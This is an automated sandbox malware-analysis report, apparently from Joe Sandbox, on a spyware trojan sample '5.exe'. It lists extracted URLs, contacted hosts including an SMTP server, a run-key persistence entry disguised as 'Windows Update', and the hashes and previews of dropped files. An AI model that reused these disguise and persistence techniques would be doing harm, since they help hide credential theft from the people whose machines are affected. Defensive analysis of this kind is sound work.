                                                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.apache.org/licenses/LICENSE-2.05.exe, 00000002.00000003.271359445.0000000005068000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpfalse
                                                              		high
                                                              https://sectigo.com/CPS0Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.tiro.comn5.exe, 00000002.00000003.268801308.000000000506B000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://whatismyipaddress.comWindows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340429486.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://nsis.sf.net/NSIS_ErrorError5.exe, 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp, 5.exe, 00000001.00000000.250058569.0000000000409000.00000008.00020000.sdmp, 5.exe, 00000002.00000000.255009792.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000000.289318913.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000002.307383650.0000000000409000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000000.296263601.0000000000409000.00000008.00020000.sdmpfalse
                                                                      		high
                                                                      https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtvbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.carterandcone.coml5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.msn.com/de-ch/?ocid=iehpvbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340429486.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.com/designers/cabarga.htmlN5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.fontbureau.com/designersg22b5.exe, 00000002.00000003.273188278.000000000505E000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.founder.com.cn/cn5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.fontbureau.com/designers/frere-jones.html5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://nsis.sf.net/NSIS_Error5.exe, 5.exe, 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp, 5.exe, 00000001.00000000.250058569.0000000000409000.00000008.00020000.sdmp, 5.exe, 00000002.00000000.255009792.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000000.289318913.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000002.307383650.0000000000409000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000000.296263601.0000000000409000.00000008.00020000.sdmpfalse
                                                                                		high
                                                                                http://fontfabrik.com-g5.exe, 00000002.00000003.269010005.0000000005060000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gvbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/cabarga.html5.exe, 00000002.00000003.273785018.000000000508A000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.273846415.000000000508A000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340429486.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.jiyu-kobo.co.jp/5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.fontbureau.com/designers85.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/accounts/servicelogin5.exe, Windows Update.exe, vbc.exefalse
                                                                                          		high
                                                                                          http://www.tiro.comc5.exe, 00000002.00000003.268753723.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268837660.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268877880.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268801308.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268958475.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268917627.000000000506B000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.fontbureau.com/designers/5.exe, 00000002.00000003.273188278.000000000505E000.00000004.00000001.sdmpfalse
                                                                                            		high

                                                                                            Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.16.155.36
                                                                                            		whatismyipaddress.comUnited States
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            66.29.159.53
                                                                                            		smtp.privateemail.comUnited States
                                                                                            		19538ADVANTAGECOMUSfalse

                                                                                            Private

                                                                                            IP
                                                                                            192.168.2.1
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                            Analysis ID:535767
                                                                                            Start date:07.12.2021
                                                                                            Start time:18:16:19
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 14m 54s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:5.exe
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:32
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@19/18@2/4
                                                                                            EGA Information:Failed
                                                                                            HDC Information:
                                                                                            • Successful, ratio: 56.9% (good quality ratio 50.7%)
                                                                                            • Quality average: 72.8%
                                                                                            • Quality standard deviation: 34%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 88%
                                                                                            • Number of executed functions: 344
                                                                                            • Number of non-executed functions: 243
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Found application associated with file extension: .exe
                                                                                            Warnings:
                                                                                            Show All
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.22, 40.112.88.60, 20.54.110.249
                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            18:17:51API Interceptor27x Sleep call for process: Windows Update.exe modified
                                                                                            18:17:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                            18:18:01API Interceptor1x Sleep call for process: dw20.exe modified
                                                                                            18:18:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                            18:18:35API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            No context

                                                                                            Domains

                                                                                            No context

                                                                                            ASN

                                                                                            No context

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_windows update.e_edbd6e1e925f10aab1172265a9dde5d263e57cc8_00000000_19b5ac3e\Report.wer
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.2381156674465787
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:nJJxLV5jGBr9B5wNg5wF1szvnuk1SKyaOGewD/u7sUS274It:JJxHjTUv1IUD/u7sUX4It
                                                                                            MD5:B47C10258EABC2107D7CB931765EF9C2
                                                                                            SHA1:C30F40027094229E864DD9FD98A1507C8A452B7C
                                                                                            SHA-256:853DEA8321711FFCCD7DDFD32EF9E5F2DF2B2219BCF276294829F0329D739A42
                                                                                            SHA-512:B5EA681207A478142F1466E87E14109E04DAB31903A345DF9A2EFBD27FE6625AAFB4360D04DB8744E10DA19EE514EBC9BE6B2B9F5B0952B3B7D66D87429302FE
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.3.4.0.3.4.7.2.9.1.2.8.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.3.4.0.3.4.7.9.8.6.5.9.8.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.1.2.3.c.1.d.-.6.0.0.5.-.4.7.d.a.-.8.2.a.4.-.0.2.e.4.9.3.0.6.f.f.0.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.6.4.-.0.0.0.1.-.0.0.1.6.-.c.d.3.6.-.7.4.c.7.d.9.e.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.1.f.4.7.9.8.5.d.3.d.4.4.a.1.6.f.b.7.6.b.2.7.3.a.7.6.a.9.7.f.d.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.8.f.7.d.c.c.8.f.f.c.d.d.3.f.9.3.3.3.3.e.7.1.1.7.7.9.e.8.d.0.2.d.b.2.d.f.a.e.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.0.6.:.0.1.:.0.0.:.4.5.!.0.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.7.5.....I.s.F.a.t.
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8916.tmp.WERInternalMetadata.xml
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):5678
                                                                                            Entropy (8bit):3.722759092557584
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:RtIU6o7r3GLt3iTA6XNmveYZ7oSfG0gEBCaM1K3l1fW4Xm:Rrl7r3GLNiTA6XNPYZ7oSTCp1al1fW+m
                                                                                            MD5:94136E0292A080EF9BC9DE95B0562FAD
                                                                                            SHA1:FE778207D73A83BEB1EB8F76E266D7BAD7CDBEB8
                                                                                            SHA-256:89B141AE7F3571624582D21AA9A39151FD89923E1F63AA4B447843D0E7A9E0B1
                                                                                            SHA-512:457676B39EFC100D4805C94D49D779B3565C8817EE0096D26601914A15BCE6B5795503021B58B41D963D5DC4A1FEC351BFAEC5DEC91F022D28638412D4E2BC50
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.4.4.<./.P.i.d.>.......
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER952C.tmp.xml
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4640
                                                                                            Entropy (8bit):4.452188744668979
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwSD8zsHJgtWI97sSWSC8Bl8fm8M4JFKbnWtFvdo+q8vonWbyKw8d:uITfpIiSNwJFKgGKryKw8d
                                                                                            MD5:4D89C5EE828851195CA96A4029839F2B
                                                                                            SHA1:04E2024691DDD80771ECBD2D889871B159AB6048
                                                                                            SHA-256:DAB13F633497D9E34D97A212E375566566D745645492F43B4E8B9636344E4D2B
                                                                                            SHA-512:37C8F6ED9F436F5DBEFAB3968FAB07C7F981D38DF69E2B7762183B3CA8E42B6A67C8C809A9DCC0A9915E3519C09D83B481E637FE5623FFE437708424DF37455E
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1288048" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\5.exe.log
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):916
                                                                                            Entropy (8bit):5.282390836641403
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                                                            MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                                                            SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                                                            SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                                                            SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                                                            C:\Users\user\AppData\Local\Temp\84a79tbwxmvn7adt
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):604159
                                                                                            Entropy (8bit):7.96721366302899
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:uL2jvzmCP0rI7B+0G36tX8j6FTkYcwpWFt7tVYkfv:uCjrml0hGqtXiuT5WX7zYk3
                                                                                            MD5:71353B7F9141FA3C5760ACE513F8C385
                                                                                            SHA1:A6DD26880269F3FAEADA77C5F74ADE2433AF78C3
                                                                                            SHA-256:FC517290096122DB50FF785F3E3FCE641EF2164EA93351A8655A43732344BF7C
                                                                                            SHA-512:CDD0A4C4278D24019837811E429312D572BEC638812B5C35EA52CAFB443719974E7C614216A499D1008F843F021E06F1F3B6AD6E66082E616EC14D876C8108C0
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: *...,.).F.C..L.q.='.Z[=.f.w4;..H..8V...s.......Ly./J...0(....0Q.jK.x.,.....J.........J6............Z..v%.bSZCc....?G......:..R.2q..z=.9...N\k....9...}C.....`}...Z.y..d...:Z..s....x.m..^/.-M...F..y...a.xj.].m...l.)U...u....){.#.h!...g..T.a.@Fn.e,.)..C;....k..Z[=cf.w.;..G8V&..s,........./J...!(.d."0R..P..D.Ft.).".S.v)WG...,p:yt...I..7tx./~....{.4....G..........e..iH.0.<L-.%...I.(N}.wD;QQ.x8.j$..(fKw.D...T.#.}V...dm..RF.G..)./#...lS..|..5...#........H...Xjs......._....g..T.a.....$,.)...C04L.d.='.\[=cf.w4;..H..8...I....7....../J#..(.d..0RF.P.bD.t.)."...d.....Myt.v..zI....8./A..S..{.n.m.8..)....@...e.i...0|.;-..>."z{(N}.wk;Q......j$...Kw..DL&\T/..}V...dm..RF.G...../#...lS..| .5...#......m.Ho..Xjs......._....g..T.a.@Fn.e,.).F.C0zL.d.='.Z[=cf.w4;..H..8V...s.......Ly./J...0(.d..0RF.P.bD.t.).".S.v.WG...,:Myt.....I..7t8./A..S..{.n.m...G..........e..i...0|<L-..>."z{(N}.wD;QQ.x8.j$..(fKw.DL..T/#.}V...dm..RF.G..)./#...lS..| .5...#......m.Ho..X
                                                                                            C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29
                                                                                            Entropy (8bit):3.9614292709896417
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:oNUWJRWQJ:oNNJAQJ
                                                                                            MD5:1356096983613619F2F854C2D0BF76F2
                                                                                            SHA1:7BB60F42B1384287EDB1AB877A8A0FB6AEDC99BA
                                                                                            SHA-256:C34B7762C591577120ADE653C8013A77EBF52CD2E6C1977F35B5880735368A63
                                                                                            SHA-512:C94A70E0E5C8A82BDE56D1E655223027DE48A2905592A718BF23D16C4A3888FFD53403ED9E4165C737BB539A6F368C183EA6FAB9DECA8B18A6D46803185731AB
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: C:\Users\user\Desktop\5.exe
                                                                                            C:\Users\user\AppData\Local\Temp\bhv636.tmp
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcfcdb90, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):26738688
                                                                                            Entropy (8bit):0.9595225336393207
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:ydLv1SxfFUAxlse9zZi2Ou/iDyUOjoEO3PX2BU:nUAxtzU2Ouj
                                                                                            MD5:569753B9E1E0EE0EC6BB7DD64526EF68
                                                                                            SHA1:B1C6ED7C99BBCFE71AE734B49BEFFC6937D5A5D6
                                                                                            SHA-256:5D9DB55451D39E1C75AFBD61B28DDE86AFF0D6AD83B87E503A4FCB0310182A55
                                                                                            SHA-512:87B90EE777ADFD53DBD56389B0A34E2EC1657C2E5DFF6A0A0603371AB654E6593595A29FD4F55AC91D18656117CAE0C1FAD8E625A4C02D348BE3B935B3D710A5
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ...... .......v1.......l~.."...wK.......................m..........yW......y7.h.o..........................k.\."...w..............................................................................................Y............B.................................................................................................................. ............y.......................................................................................................................................................................................................................................z.,.....y....................y.....y7.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Qn:Qn
                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ..
                                                                                            C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dll
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):159744
                                                                                            Entropy (8bit):6.52147420132688
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                            MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                            SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                            SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                            SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%]..v]..v]..vP.(v}..vP..vR..vP.)v3..vI..wD..v]..v,..v...w\..v...w\..v..6v\..v...w\..vRich]..v........PE..L....`.a...........!......................................................................@.................................d....................................... ...............................@...@............................................text............................... ..`.rdata..Jf.......h..................@..@.data....p... ...T..................@....rsrc................V..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):159744
